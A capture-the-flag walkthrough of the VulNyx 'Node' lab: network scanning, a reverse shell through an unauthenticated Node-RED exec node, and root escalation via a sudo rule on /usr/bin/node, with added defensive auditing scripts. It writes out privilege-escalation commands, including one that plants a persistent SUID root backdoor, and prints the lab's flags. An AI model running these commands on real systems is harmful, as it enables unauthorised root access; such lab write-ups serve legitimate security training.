Vlx_Node

Box source: https://vulnyx.com/

Difficulty: Low

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 17:14 CST
Nmap scan report for 192.168.2.1
Host is up (0.00055s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00049s latency).
MAC Address: 08:00:27:F6:7B:61 (Oracle VirtualBox virtual NIC)
Nmap scan report for sunset.leak.dsz (192.168.2.42)
Host is up (0.00053s latency).
MAC Address: 08:00:27:7E:CE:00 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.15 seconds

Target IP: 192.168.2.42

2. Port scanning

(1) Full TCP port scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 17:14 CST
Nmap scan report for sunset.leak.dsz (192.168.2.42)
Host is up (0.00041s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1880/tcp open vsat-control
MAC Address: 08:00:27:7E:CE:00 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 40.44 seconds

Open ports: 22, 80, 1880

(2) Service, version and OS detection

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,1880 192.168.2.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 17:15 CST
Nmap scan report for sunset.leak.dsz (192.168.2.42)
Host is up (0.00084s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
1880/tcp open http Node.js Express framework
|_http-cors: GET POST PUT DELETE
|_http-title: Node-RED
MAC Address: 08:00:27:7E:CE:00 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.04 seconds

II. Web exploitation

1. Port 80 website

Port 80 serves only the Apache2 Debian default page.

2. Port 1880: Node-RED

Port 1880 serves a Node-RED editor.

Testing shows that the exec node is available, so a reverse shell can be sent directly from a flow.

Shell obtained:

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.42] 43348
id
uid=1000(dev) gid=1000(dev) grupos=1000(dev)
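The exec-node step above works because the Node-RED editor accepts flow deployments from anyone who can reach port 1880. As an added example (not code from the original post or from the Node-RED project), the script below holds a hardened settings object using only documented Node-RED keys (uiPort, uiHost, adminAuth, httpNodeAuth) and audits a settings object for the controls that would have blocked this step. The bcrypt values are placeholders; a real hash comes from `node-red admin hash-pw`.

```javascript
// Added example, not part of the original post or of Node-RED itself:
// a small audit of a Node-RED settings object for editor authentication and
// listen address. Only documented settings keys are used; hashes are placeholders.

// Hardened settings: editor bound to loopback and protected by credentials.
const hardenedSettings = {
  uiPort: 1880,
  uiHost: "127.0.0.1", // reach the editor through an SSH tunnel or VPN instead
  adminAuth: {
    type: "credentials",
    users: [
      {
        username: "admin",
        // placeholder: generate a real hash with `node-red admin hash-pw`
        password: "$2b$08$PLACEHOLDER_BCRYPT_HASH",
        permissions: "*",
      },
    ],
  },
  // Basic auth for HTTP-in endpoints, same placeholder convention.
  httpNodeAuth: { user: "svc", pass: "$2b$08$PLACEHOLDER_BCRYPT_HASH" },
};

// What a default install looks like: no adminAuth, listening on every interface.
const defaultSettings = { uiPort: 1880 };

// Returns human-readable findings; an empty list means every check passed.
function auditNodeRedSettings(settings) {
  const findings = [];
  const auth = settings.adminAuth;
  if (!auth) {
    findings.push("adminAuth missing: anyone who can reach the port can deploy flows, including exec nodes");
  } else if (auth.type === "credentials") {
    const users = Array.isArray(auth.users) ? auth.users : [];
    if (users.length === 0) findings.push("adminAuth.users is empty: no usable account is defined");
    for (const u of users) {
      // Node-RED expects a bcrypt hash here, never a plaintext password.
      if (typeof u.password !== "string" || !u.password.startsWith("$2")) {
        findings.push(`adminAuth user ${u.username}: password must be a bcrypt hash, not plaintext`);
      }
    }
  }
  if (!settings.uiHost || settings.uiHost === "0.0.0.0") {
    findings.push("uiHost unset or 0.0.0.0: editor is exposed on every interface");
  }
  return findings;
}

// Stand-alone run: show both results.
console.log("hardened:", auditNodeRedSettings(hardenedSettings));
console.log("default :", auditNodeRedSettings(defaultSettings));
```

Even with adminAuth in place, the exec node still runs commands as the Node-RED service account (here uid 1000, dev), so the account that runs Node-RED should be an unprivileged one with no sudo rights.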

Stabilising the shell

/usr/bin/script -qc /bin/bash /dev/null
# press Ctrl+Z to suspend the shell
stty raw -echo; fg
# press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

III. Privilege escalation

Check sudo -l:

dev@node:~$ sudo -l
Matching Defaults entries for dev on node:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dev may run the following commands on node:
(root) NOPASSWD: /usr/bin/node

User dev can run /usr/bin/node as root without a password.

Option 1: spawn a shell directly

sudo /usr/bin/node -e "require('child_process').spawn('/bin/bash', {stdio: [0,1,2]})"

Explanation:

  • sudo /usr/bin/node: runs node as root.
  • -e "...": evaluates the given JavaScript string directly.
  • child_process.spawn(): the Node.js API for starting a child process.
  • {stdio: [0,1,2]}: attaches the child's stdin, stdout and stderr to the current terminal, giving an interactive shell.
dev@node:~$ sudo /usr/bin/node -e "require('child_process').spawn('/bin/bash', {stdio: [0,1,2]})"
root@node:/home/dev# id
uid=0(root) gid=0(root) grupos=0(root)

Option 2: use execSync

If you only need to run a single command (for example to read /etc/shadow):

sudo /usr/bin/node -e "console.log(require('child_process').execSync('id').toString())"

This is not an interactive shell, but it is convenient for a quick check.

dev@node:~$ sudo /usr/bin/node -e "console.log(require('child_process').execSync('id').toString())"
uid=0(root) gid=0(root) grupos=0(root)

Option 3: write a SUID shell

This creates a persistent root backdoor:

sudo /usr/bin/node -e " const fs = require('fs'); fs.copyFileSync('/bin/bash', '/tmp/rootbash'); fs.chmodSync('/tmp/rootbash', 0o4755); "

Then run it directly:

/tmp/rootbash -p

⚠️ Note: this method leaves obvious traces.
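The root cause of this whole section is a single sudoers rule: any interpreter that can spawn processes, granted as root, is a root shell whether or not NOPASSWD is set. As an added example (not part of the original post), the script below parses `sudo -l` output in the format shown above and flags such rules. The input is constructed to mirror the walkthrough plus two extra rules for contrast, and the interpreter list is an illustrative assumption rather than a complete one.

```javascript
// Added example, not part of the original post: parse `sudo -l` output and flag
// rules that hand a script interpreter or shell to root. Input is constructed.

const SUDO_L_OUTPUT = `Matching Defaults entries for dev on node:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User dev may run the following commands on node:
    (root) NOPASSWD: /usr/bin/node
    (root) /usr/bin/systemctl restart node-red
    (ALL : ALL) NOPASSWD: /usr/bin/python3 -c *
`;

// Binaries that execute arbitrary code once they run as root. Assumption: this
// short list is illustrative; a real audit should draw on a maintained
// reference such as GTFOBins.
const INTERPRETERS = new Set([
  "node", "nodejs", "python", "python2", "python3", "perl", "ruby", "php",
  "bash", "sh", "dash", "zsh", "awk", "find", "vim", "vi", "less", "more",
]);

// Turn the "User X may run ..." section into {runAs, tags, command} records.
function parseSudoL(text) {
  const rules = [];
  let inCommands = false;
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (/^User \S+ may run the following commands/.test(line)) { inCommands = true; continue; }
    if (!inCommands || line === "") continue;
    // e.g. "(root) NOPASSWD: /usr/bin/node" or "(ALL : ALL) /bin/ls"
    const m = /^\(([^)]+)\)\s+((?:[A-Z]+:\s*)*)(.+)$/.exec(line);
    if (!m) continue;
    rules.push({
      runAs: m[1].replace(/\s+/g, ""),
      tags: m[2].split(":").map((t) => t.trim()).filter(Boolean),
      command: m[3].trim(),
    });
  }
  return rules;
}

function basename(p) { return p.slice(p.lastIndexOf("/") + 1); }

// One finding per rule whose command is "ALL" or a known interpreter/shell.
function auditSudoRules(rules) {
  const findings = [];
  for (const r of rules) {
    const bin = basename(r.command.split(/\s+/)[0]);
    const anyCommand = r.command === "ALL";
    if (!anyCommand && !INTERPRETERS.has(bin)) continue;
    const asRoot = r.runAs === "root" || r.runAs.startsWith("ALL");
    findings.push({
      command: r.command,
      runAs: r.runAs,
      passwordless: r.tags.includes("NOPASSWD"),
      severity: asRoot ? "critical" : "high",
      note: anyCommand ? "unrestricted command" : `${bin} can spawn arbitrary processes`,
    });
  }
  return findings;
}

// Stand-alone run: print the findings for the constructed input.
console.log(auditSudoRules(parseSudoL(SUDO_L_OUTPUT)));
```

The systemctl rule is not flagged because its arguments are fixed; that is the pattern to keep. If dev genuinely needs to run something as root, the fix is a wrapper script with fixed arguments and no user-controlled input rather than any rule on the interpreter itself.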

IV. Flags

rootbash-5.1# cat /root/root.txt /home/dev/user.txt 
022f2cdb73481093671bd0478637826e
7af9fe48030ae8afab06e30ee132d9b4

Vlx_Node
http://miao-sec.github.io/Vulnyx/Vlx_Node/
Author: Miao
Published: 13 January 2026
License: BY-MIAO